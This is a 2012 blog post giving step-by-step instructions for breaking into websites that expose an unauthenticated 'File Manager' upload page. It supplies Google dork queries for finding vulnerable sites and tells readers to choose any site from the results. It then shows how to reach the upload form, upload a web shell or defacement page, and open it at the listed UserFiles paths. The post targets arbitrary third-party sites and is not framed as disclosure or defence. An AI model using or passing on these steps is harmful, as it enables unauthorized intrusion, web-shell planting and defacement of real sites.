New Post

» » "File Manager" Remote Shell and Deface Upload Vulnerability.
Monday, September 24, 2012

Following is the vulnerability to remotly upload your shell or deface on a vulnerable website.


Google Dorks:
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
Vulnerable URL:
http://www.site.com/filemanager/index.html
Now, google the dork and select any website from the search result.
When you will select any website, the URL will be as
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Now delete the text after filemanager. Now after deleteing the text URL will be
http://www.site.com/filemanager/
You will get a upload option, upload your shell or deface there.
Your will will be uploaded in Userfiles directory. z
To view your shell visit the below mentioned URLs:

http://www.site.com/UserFiles/Shell.php

http://www.site.com/UserFiles/deface.html
or 
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html
Được đăng bởi vào lúc 9/24/2012 10:18:00 AM
Nhãn:

0 nhận xét:

Post a Comment

Subscribe to: Post Comments (Atom)